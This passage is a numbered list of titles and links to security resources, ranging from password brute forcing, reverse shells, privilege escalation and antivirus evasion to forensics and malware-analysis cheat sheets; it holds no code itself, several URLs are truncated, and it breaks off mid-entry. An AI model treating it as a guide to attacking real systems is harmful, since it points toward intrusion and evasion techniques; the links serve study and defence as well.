-742-5 ways to Exploiting PUT Vulnerability:
http://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit
-743-5 Ways to Exploit Verb Tempering Vulnerability:
http://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability
-744-5 Ways to Hack MySQL Login Password:
http://www.hackingarticles.in/5-ways-to-hack-mysql-login-password
-745-5 Ways to Hack SMB Login Password:
http://www.hackingarticles.in/5-ways-to-hack-smb-login-password
-746-6 Ways to Hack FTP Login Password:
http://www.hackingarticles.in/6-ways-to-hack-ftp-login-password
-746-6 Ways to Hack SNMP Password:
http://www.hackingarticles.in/6-ways-to-hack-snmp-password
-747-6 Ways to Hack VNC Login Password:
http://www.hackingarticles.in/6-ways-to-hack-vnc-login-password
-748-Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter:
http://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter
-749-Beginner Guide to IPtables:
http://www.hackingarticles.in/beginner-guide-iptables
-750-Beginner Guide to impacket Tool kit:
http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit
-751-Exploit Remote Windows 10 PC using Discover Tool:
http://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool
-752-Forensics Investigation of Remote PC (Part 2):
http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2
-753-5 ways to File upload vulnerability Exploitation:
http://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation
-754-FTP Penetration Testing in Ubuntu (Port 21):
http://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21
-755-FTP Penetration Testing on Windows (Port 21):
http://www.hackingarticles.in/ftp-penetration-testing-windows
-756-FTP Pivoting through RDP:
http://www.hackingarticles.in/ftp-pivoting-rdp
-757-Fun with Metasploit Payloads:
http://www.hackingarticles.in/fun-metasploit-payloads
-758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC:
http://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc
-759-Generating Reverse Shell using Msfvenom (One Liner Payload):
http://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload
-760-Generating Scan Reports Using Nmap (Output Scan):
http://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan
-761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled):
http://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled
-762-Hack ALL Security Features in Remote Windows 7 PC:
http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc
-763-5 ways to Exploit LFi Vulnerability:
http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability
-764-5 Ways to Directory Bruteforcing on Web Server:
http://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server
-765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit:
http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit
-766-Hack Gmail and Facebook Password in Network using Bettercap:
http://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap
-767-ICMP Penetration Testing:
http://www.hackingarticles.in/icmp-penetration-testing
-768-Understanding Guide to Mimikatz:
http://www.hackingarticles.in/understanding-guide-mimikatz
-769-5 Ways to Create Dictionary for Bruteforcing:
http://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing
-770-Linux Privilege Escalation using LD_Preload:
http://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/
-771-2 Ways to Hack Remote Desktop Password using kali Linux:
http://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux
-772-2 ways to use Msfvenom Payload with Netcat:
http://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat
-773-4 ways to Connect Remote PC using SMB Port:
http://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port
-774-4 Ways to DNS Enumeration:
http://www.hackingarticles.in/4-ways-dns-enumeration
-775-4 Ways to get Linux Privilege Escalation:
http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation
-776-101+ OSINT Resources for Investigators [2019]:
https://i-sight.com/resources/101-osint-resources-for-investigators/
-777-Week in OSINT #2019–02:
https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f
-778-OSINT Cheat Sheet:
https://hack2interesting.com/osint-cheat-sheet/
-779-OSINT Cheat Sheet:
https://infoskirmish.com/osint-cheat-sheet/
-780-OSINT Links for Investigators:
https://i-sight.com/resources/osint-links-for-investigators/
-781- Metasploit Cheat Sheet :
https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html
-782- Exploit Development Cheat Sheet:
https://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4
-783-Building Profiles for a Social Engineering Attack:
https://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/
-784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes):
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
-785-Getting the goods with CrackMapExec: Part 2:
https://byt3bl33d3r.github.io/tag/crackmapexec.html
-786-Bug Hunting Methodology (part-1):
https://medium.com/p/91295b2d2066
-787-Exploring Cobalt Strike's ExternalC2 framework:
https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/
-788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities:
https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/
-789-Adversarial Tactics, Techniques & Common Knowledge:
https://attack.mitre.org/wiki/Main_Page
-790-Bug Bounty — Tips / Tricks / JS (JavaScript Files):
https://medium.com/p/bdde412ea49d
-791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition):
https://medium.com/p/f88a9f383fcc
-792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory
Database Extraction:
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts:
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
-794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution:
https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/
-795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2):
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
-796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction:
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation:
https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/
-798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction:
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement:
https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
-800-Capcom Rootkit Proof-Of-Concept:
https://www.fuzzysecurity.com/tutorials/28.html
-801-Linux Privilege Escalation using Misconfigured NFS:
http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
-802-Beginners Guide for John the Ripper (Part 1):
http://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/
-803-Working of Traceroute using Wireshark:
http://www.hackingarticles.in/working-of-traceroute-using-wireshark/
-804-Multiple Ways to Get root through Writable File:
http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/
-805-4 ways to SMTP Enumeration:
http://www.hackingarticles.in/4-ways-smtp-enumeration
-806-4 ways to Hack MS SQL Login Password:
http://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password
-807-4 Ways to Hack Telnet Passsword:
http://www.hackingarticles.in/4-ways-to-hack-telnet-passsword
-808-5 ways to Brute Force Attack on WordPress Website:
http://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website
-809-5 Ways to Crawl a Website:
http://www.hackingarticles.in/5-ways-crawl-website
-810-Local Linux Enumeration & Privilege Escalation Cheatsheet:
https://www.rebootuser.com/?p=1623
-811-The Drebin Dataset:
https://www.sec.cs.tu-bs.de/~danarp/drebin/download.html
-812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else:
https://www.slideshare.net/x00mario/es6-en
-813-IT and Information Security Cheat Sheets:
https://zeltser.com/cheat-sheets/
-814-Cheat Sheets - DFIR Training:
https://www.dfir.training/cheat-sheets
-815-WinDbg Malware Analysis Cheat Sheet:
https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/
-819-Cheat Sheet for Analyzing Malicious Software:
https://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/
-820-Analyzing Malicious Documents Cheat Sheet - Prodefence:
https://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/
-821-Cheat Sheets - SANS Digital Forensics:
https://digital-forensics.sans.org/community/cheat-sheets
-822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet:
https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/
-823-Windows Registry Auditing Cheat Sheet:
https://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology
-824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know:
https://kennyvn.com/cheatsheet-useful-bash-commands-linux/
-825-kali-linux-cheatsheet:
https://github.com/NoorQureshi/kali-linux-cheatsheet
-826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition):
https://securedyou.com/best-kali-linux-commands-terminal-hacking/
-827-Kali Linux Commands Cheat Sheet:
https://www.pinterest.com/pin/393431717429496576/
-827-Kali Linux Commands Cheat Sheet A To Z:
https://officialhacker.com/linux-commands-cheat-sheet/
-828-Linux commands CHEATSHEET for HACKERS:
https://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/
-829-100 Linux Commands – A Brief Outline With Cheatsheet:
https://fosslovers.com/100-linux-commands-cheatsheet/
-830-Kali Linux – Penetration Testing Cheat Sheet:
https://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/
-831-Basic Linux Terminal Shortcuts Cheat Sheet :
https://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/
-832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} :
https://itechhacks.com/kali-linux-and-linux-commands/
-833-Transferring files from Kali to Windows (post exploitation):
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
-834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux:
https://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet
-835-What is penetration testing? 10 hacking tools the pros use:
https://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html
-836-Best Hacking Tools List for Hackers & Security Professionals in 2019:
https://gbhackers.com/hacking-tools-list/
-837-ExploitedBunker PenTest Cheatsheet:
https://exploitedbunker.com/articles/pentest-cheatsheet/
-838-How to use Zarp for penetration testing:
https://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/
-839-Wireless Penetration Testing Cheat Sheet;
https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/
-840-Pentest Cheat Sheets:
https://www.cheatography.com/tag/pentest/
-841-40 Best Penetration Testing (Pen Testing) Tools in 2019:
https://www.guru99.com/top-5-penetration-testing-tools.html
-842-Metasploit Cheat Sheet:
https://www.hacking.land/2019/02/metasploit-cheat-sheet.html
-843-OSCP useful resources and tools;
https://acknak.fr/en/articles/oscp-tools/
-844-Pentest + Exploit dev Cheatsheet:
https://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/
-845-What is Penetration Testing? A Quick Guide for 2019:
https://www.cloudwards.net/penetration-testing/
-846-Recon resource:
https://pentester.land/cheatsheets/2019/04/15/recon-resources.html
-847-Network Recon Cheat Sheet:
https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/
-848-Recon Cheat Sheets:
https://www.cheatography.com/tag/recon/
-849-Penetration Testing Active Directory, Part II:
https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
-850-Reverse-engineering Cheat Sheets:
https://www.cheatography.com/tag/reverse-engineering/
-851-Reverse Engineering Cheat Sheet:
https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet
-852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS:
https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows
-853-PROPagate:
http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/
-854-Process Doppelgänging, by Tal Liberman and Eugene Kogan::
https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
-855-Gargoyle:
https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
-856-GHOSTHOOK:
https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/
-857-Learn C:
https://www.programiz.com/c-programming
-858-x86 Assembly Programming Tutorial:
https://www.tutorialspoint.com/assembly_programming/
-859-Dr. Paul Carter's PC Assembly Language:
http://pacman128.github.io/pcasm/
-860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration:
http://opensecuritytraining.info/IntroX86.html
-861-x86 Disassembly:
https://en.wikibooks.org/wiki/X86_Disassembly
-862-use-of-dns-tunneling-for-cc-communications-malware:
https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/
-863-Using IDAPython to Make Your Life Easier (Series)::
https://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/
-864-NET binary analysis:
https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/
-865-detailed analysis of the BlackEnergy3 big dropper:
https://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/
-866-detailed analysis of Uroburos rootkit:
https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg
-867-TCP/IP and tcpdump Pocket Reference Guide:
https://www.sans.org/security-resources/tcpip.pdf
-868-TCPDUMP Cheatsheet:
http://packetlife.net/media/library/12/tcpdump.pdf
-869-Scapy Cheatsheet:
http://packetlife.net/media/library/36/scapy.pdf
-870-WIRESHARK DISPLAY FILTERS:
http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
-871-Windows command line sheet:
https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf
-872-Metasploit cheat sheet:
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
-873-IPv6 Cheatsheet:
http://packetlife.net/media/library/8/IPv6.pdf
-874-IPv4 Subnetting:
http://packetlife.net/media/library/15/IPv4_Subnetting.pdf
-875-IOS IPV4 ACCESS LISTS:
http://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf
-876-Common Ports List:
http://packetlife.net/media/library/23/common_ports.pdf
-877-WLAN:
http://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf
-878-VLANs Cheatsheet:
http://packetlife.net/media/library/20/VLANs.pdf
-879-VoIP Basics CheatSheet:
http://packetlife.net/media/library/34/VOIP_Basics.pdf
-880-Google hacking and defense cheat sheet:
https://www.sans.org/security-resources/GoogleCheatSheet.pdf
-881-Nmap CheatSheet:
https://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0
-882-Netcat cheat sheet:
https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
-883-PowerShell cheat sheet:
https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf
-884-Scapy cheat sheet POCKET REFERENCE:
https://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf
-885-SQL injection cheat sheet.:
https://information.rapid7.com/sql-injection-cheat-sheet-download.html
-886-Injection cheat sheet:
https://information.rapid7.com/injection-non-sql-cheat-sheet-download.html
-887-Symmetric Encryption Algorithms cheat sheet:
https://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/
-888-Intrusion Discovery Cheat Sheet v2.0 for Linux:
https://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf
-889-Intrusion Discovery Cheat Sheet v2.0 for Window:
https://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf
-890-Memory Forensics Cheat Sheet v1.2:
https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf
-891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH:
https://www.sans.org/brochure/course/log-management-in-depth/6
-892-Evidence collection cheat sheet:
https://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf
-893-Hex file and regex cheat sheet v1.0:
https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf
-894-Rekall Memory Forensic Framework Cheat Sheet v1.2.:
https://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf
-895-SIFT WORKSTATION Cheat Sheet v3.0.:
https://digital-forensics.sans.org/media/sift_cheat_sheet.pdf
-896-Volatility Memory Forensic Framework Cheat Sheet:
https://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf
-897-Hands - on Network Forensics.:
https://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf
-898-VoIP Security Vulnerabilities.:
https://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036
-899-Incident Response: How to Fight Back:
https://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342
-900-BI-7_VoIP_Analysis_Fundamentals:
https://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf
-901-Bug Hunting Guide:
cybertheta.blogspot.com/2018/08/bug-hunting-guide.html
-902-Guide 001 |Getting Started in Bug Bounty Hunting:
https://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun...
-903-SQL injection cheat sheet :
https://portswigger.net › Web Security Academy › SQL injection › Cheat sheet
-904-RSnake's XSS Cheat Sheet:
https://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/
-905-Bug Bounty Tips (2):
https://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/
-906-A Review of my Bug Hunting Journey:
https://kongwenbin.com/a-review-of-my-bug-hunting-journey/
-907-Meet the First Hacker Millionaire on HackerOne:
https://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/
-908-XSS Cheat Sheet:
https://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/
-909-Bug Bounty Hunter Methodology:
https://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016
-910-#10 Rules of Bug Bounty:
https://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c
-911-Bugbounty Checklist:
https://www.excis3.be/bugbounty-checklist/21/
-912-FireBounty | The Ultimate Bug Bounty List!:
https://firebounty.com/
-913-Brutelogic xss cheat sheet 2019:
https://brutelogic.com.br/blog/ebook/xss-cheat-sheet/
-914-XSS Cheat Sheet by Rodolfo Assis:
https://leanpub.com/xss
-915-Cross-Site-Scripting (XSS) – Cheat Sheet:
https://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/
-916-XSS Cheat Sheet V. 2018 :
https://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/
-917-Cross-site Scripting Payloads Cheat Sheet :
https://exploit.linuxsec.org/xss-payloads-list
-918-Xss Cheat Sheet :
https://www.in-secure.org/tag/xss-cheat-sheet/
-919-Open Redirect Cheat Sheet :
https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html
-920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet:
https://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php
-921-XSS Cheat Sheet:
https://tools.paco.bg/13/
-922-XSS for ASP.net developers:
https://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers
-923-Cross-Site Request Forgery Cheat Sheet:
https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/
-924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens:
https://www.acunetix.com/websitesecurity/csrf-attacks/
-925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet :
https://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee...
-926-Guide to CSRF (Cross-Site Request Forgery):
https://www.veracode.com/security/csrf
-927-Cross-site Request Forgery - Exploitation & Prevention:
https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/
-928-SQL Injection Cheat Sheet :
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
-929-MySQL SQL Injection Practical Cheat Sheet:
https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/
-930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection:
https://www.checkmarx.com/knowledge/knowledgebase/SQLi
-931-SQL injection attacks: A cheat sheet for business pros:
https://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/
-932-The SQL Injection Cheat Sheet:
https://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon
-933-SQL Injection Cheat Sheet:
https://resources.infosecinstitute.com/sql-injection-cheat-sheet/
-934-Comprehensive SQL Injection Cheat Sheet:
https://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/
-935-MySQL SQL Injection Cheat Sheet:
pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
-936-SQL Injection Cheat Sheet: MySQL:
https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/
-937- MySQL Injection Cheat Sheet:
https://www.asafety.fr/mysql-injection-cheat-sheet/
-938-SQL Injection Cheat Sheet:
https://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/
-939-Google dorks cheat sheet 2019:
https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019
-940-Command Injection Cheatsheet :
https://hackersonlineclub.com/command-injection-cheatsheet/
-941-OS Command Injection Vulnerability:
https://www.immuniweb.com/vulnerability/os-command-injection.html
-942-OS Command Injection:
https://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection
-943-Command Injection: The Good, the Bad and the Blind:
https://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/
-944-OS command injection:
https://portswigger.net › Web Security Academy › OS command injection
-945-How to Test for Command Injection:
https://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html
-946-Data Exfiltration via Blind OS Command Injection:
https://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection
-947-XXE Cheatsheet:
https://www.gracefulsecurity.com/xxe-cheatsheet/
-948-bugbounty-cheatsheet/xxe.:
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md
-949-XXE - Information Security:
https://phonexicum.github.io/infosec/xxe.html
-950-XXE Cheat Sheet:
https://www.hahwul.com/p/xxe-cheat-sheet.html
-951-Advice From A Researcher: Hunting XXE For Fun and Profit:
https://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/
-952-Out of Band Exploitation (OOB) CheatSheet :
https://www.notsosecure.com/oob-exploitation-cheatsheet/
-953-Web app penentration testing checklist and cheatsheet:
www.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example
-954-Useful Resources:
https://lsdsecurity.com/useful-resources/
-955-Exploiting XXE Vulnerabilities in IIS/.NET:
https://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti...
-956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE:
https://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/
-957-Hacking Resources:
https://www.torontowebsitedeveloper.com/hacking-resources
-958-Out of Band XML External Entity Injection:
https://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio...
-959-XXE - ZeroSec - Adventures In Information Security:
https://blog.zsec.uk/out-of-band-xxe-2/
-960-Blog - Automated Data Exfiltration with XXE:
https://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html
-961-My Experience during Infosec Interviews:
https://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8
-962-Top 10 Security Risks on the Web (OWASP):
https://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t...
-963-Antivirus Evasion Tools [Updated 2019] :
https://resources.infosecinstitute.com/antivirus-evasion-tools/
-964-Adventures in Anti-Virus Evasion:
https://www.gracefulsecurity.com/anti-virus-evasion/
-965-Antivirus Bypass Phantom Evasion - 2019 :
https://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/
-966-Antivirus Evasion with Python:
https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1
-967-Windows oneliners to get shell:
https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/
-968-Does Veil Evasion Still Work Against Modern AntiVirus?:
https://www.hackingloops.com/veil-evasion-virustotal/
-969-Google dorks cheat sheet 2019 :
https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019
-970-Malware Evasion Techniques :
https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques
-971-How to become a cybersecurity pro: A cheat sheet:
https://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/
-972-Bypassing Antivirus With Ten Lines of Code:
https://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html
-973-Bypassing antivirus detection on a PDF exploit:
https://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit
-974-Generating Payloads & Anti-Virus Bypass Methods:
https://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/
-975-Apkwash Android Antivirus Evasion For Msfvemon:
https://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/
-976-Penetration Testing with Windows Computer & Bypassing an Antivirus:
https://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus
-978-Penetration Testing: The Quest For Fully UnDetectable Malware:
https://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware
-979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework :
https://githacktools.blogspot.com
-980-Creating an undetectable payload using Veil-Evasion Toolkit:
https://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/
-981-Evading Antivirus :
https://sathisharthars.com/tag/evading-antivirus/
-982-AVPASS – All things in moderation:
https://hydrasky.com/mobile-security/avpass/
-983-Complete Penetration Testing & Hacking Tools List:
https://cybarrior.com/blog/2019/03/31/hacking-tools-list/
-984-Modern red teaming: 21 resources for your security team:
https://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team
-985-BloodHound and CypherDog Cheatsheet :
https://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/
-986-Redteam Archives:
https://ethicalhackingguru.com/category/redteam/
-987-NMAP Commands Cheat Sheet:
https://www.networkstraining.com/nmap-commands-cheat-sheet/
-988-Nmap Cheat Sheet:
https://dhound.io/blog/nmap-cheatsheet
-989-Nmap Cheat Sheet: From Discovery to Exploits:
https://resources.infosecinstitute.com/nmap-cheat-sheet/
-990-Nmap Cheat Sheet and Pro Tips:
https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/
-991-Nmap Tutorial: from the Basics to Advanced Tips:
https://hackertarget.com/nmap-tutorial/
-992-How to run a complete network scan with OpenVAS;
https://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/
-993-Nmap: my own cheatsheet:
https://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/
-994-Top 32 Nmap Command Examples For Linux Sys/Network Admins:
https://www.cyberciti.biz/security/nmap-command-examples-tutorials/
-995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker:
https://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html
-996-Scanning Tools:
https://widesecurity.net/kali-linux/kali-linux-tools-scanning/
-997-Nmap - Cheatsheet:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/
-998-Linux for Network Engineers:
https://netbeez.net/blog/linux-how-to-use-nmap/
-999-Nmap Cheat Sheet:
https://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/
-1000-Tactical Nmap for Beginner Network Reconnaissance:
https://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss...
-1001-A Guide For Google Hacking Database:
https://www.hackgentips.com/google-hacking-database/
-1002-2019 Data Breaches - The Worst Breaches, So Far:
https://www.identityforce.com/blog/2019-data-breaches
-1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills:
https://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills
-1004-Google Hacking Master List :
https://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408
-1005-Smart searching with googleDorking | Exposing the Invisible:
https://exposingtheinvisible.org/guides/google-dorking/
-1006-Google Dorks 2019:
https://korben.info/google-dorks-2019-liste.html
-1007-Google Dorks List and how to use it for Good;
https://edgy.app/google-dorks-list
-1008-How to Use Google to Hack(Googledorks):
https://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/
-1009-Using google as hacking tool:
